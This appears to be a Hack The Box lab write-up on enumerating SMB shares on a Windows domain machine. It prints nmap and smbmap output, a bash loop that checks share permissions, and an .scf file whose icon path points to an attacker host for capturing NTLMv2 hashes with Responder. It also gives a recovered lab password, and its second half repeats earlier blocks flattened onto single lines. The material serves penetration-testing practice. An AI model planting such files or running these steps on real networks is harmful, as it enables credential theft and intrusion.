SMB

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

SMB NULL SHARES

	dr--r--r--                0 Mon Jul  2 15:16:54 2018	2018
	.\Department Shares\Users\*
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	.
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	..
	dr--r--r--                0 Mon Jul  2 15:18:43 2018	amanda
	dr--r--r--                0 Mon Jul  2 15:19:06 2018	amanda_adm
	dr--r--r--                0 Mon Jul  2 15:18:28 2018	bill
	dr--r--r--                0 Mon Jul  2 15:18:31 2018	bob
	dr--r--r--                0 Mon Jul  2 15:19:14 2018	chris
	dr--r--r--                0 Mon Jul  2 15:18:39 2018	henry
	dr--r--r--                0 Mon Jul  2 15:18:34 2018	joe
	dr--r--r--                0 Mon Jul  2 15:18:53 2018	jose
	dr--r--r--                0 Tue Jul 10 17:39:32 2018	lkys37en
	dr--r--r--                0 Mon Jul  2 15:18:48 2018	morgan
	dr--r--r--                0 Mon Jul  2 15:19:20 2018	mrb3n
	dr--r--r--                0 Wed Sep 26 01:45:32 2018	Public

Was able to get a list of other users who I might be able to roast.

Unfortunately for us kerberos isnt open to the public therefore that is why we were unable to execute AESEPRoast attacks.

However after mounting hte share we were able to see the users and the permissions to these folders.

Using the followowing Script

tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm
[*] Enumerating Permissions in the Public:

	ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ

Since we have write acess to the Public folder there is many ways that we coudl get a shell out of this, we coudl possibly steal hashes as well as possibly putting files like an hta file.

After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.

[Shell]
Command=2
IconFile=\\10.10.14.7\home\kali\driver.scf
[Taskbar]
Command=ToggleDesktop

Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.

smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972'       
[+] IP: 10.10.10.103:445	Name: HTB.LOCAL                                         
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	Department Shares                                 	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Operations                                        	NO ACCESS	
	SYSVOL                                            	READ ONLY	Logon server share

We could have additional permisisons to access other shares.

RPC

user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[amanda] rid:[0x450] user:[mrlky] rid:[0x643] user:[sizzler] rid:[0x644]

PreviousRPC NextNetBIOs

Last updated 2 years ago

dr--r--r-- 0 Mon Jul 2 15:16:54 2018 2018 .\Department Shares\Users\* dr--r--r-- 0 Tue Jul 10 17:39:32 2018 . dr--r--r-- 0 Tue Jul 10 17:39:32 2018 .. dr--r--r-- 0 Mon Jul 2 15:18:43 2018 amanda dr--r--r-- 0 Mon Jul 2 15:19:06 2018 amanda_adm dr--r--r-- 0 Mon Jul 2 15:18:28 2018 bill dr--r--r-- 0 Mon Jul 2 15:18:31 2018 bob dr--r--r-- 0 Mon Jul 2 15:19:14 2018 chris dr--r--r-- 0 Mon Jul 2 15:18:39 2018 henry dr--r--r-- 0 Mon Jul 2 15:18:34 2018 joe dr--r--r-- 0 Mon Jul 2 15:18:53 2018 jose dr--r--r-- 0 Tue Jul 10 17:39:32 2018 lkys37en dr--r--r-- 0 Mon Jul 2 15:18:48 2018 morgan dr--r--r-- 0 Mon Jul 2 15:19:20 2018 mrb3n dr--r--r-- 0 Wed Sep 26 01:45:32 2018 Public

tput civis; for directory in $(ls); do echo -e "\n [*] Enumerating Permissions in the $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done; tput cnorm [*] Enumerating Permissions in the Public: ACL:Everyone:ALLOWED/OI|CI/FULL ACL:Everyone:ALLOWED/OI|CI|I/READ

smbmap -H 10.10.10.103 -u 'amanda' -p 'Ashare1972' [+] IP: 10.10.10.103:445 Name: HTB.LOCAL Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share CertEnroll READ ONLY Active Directory Certificate Services share Department Shares READ ONLY IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share Operations NO ACCESS SYSVOL READ ONLY Logon server share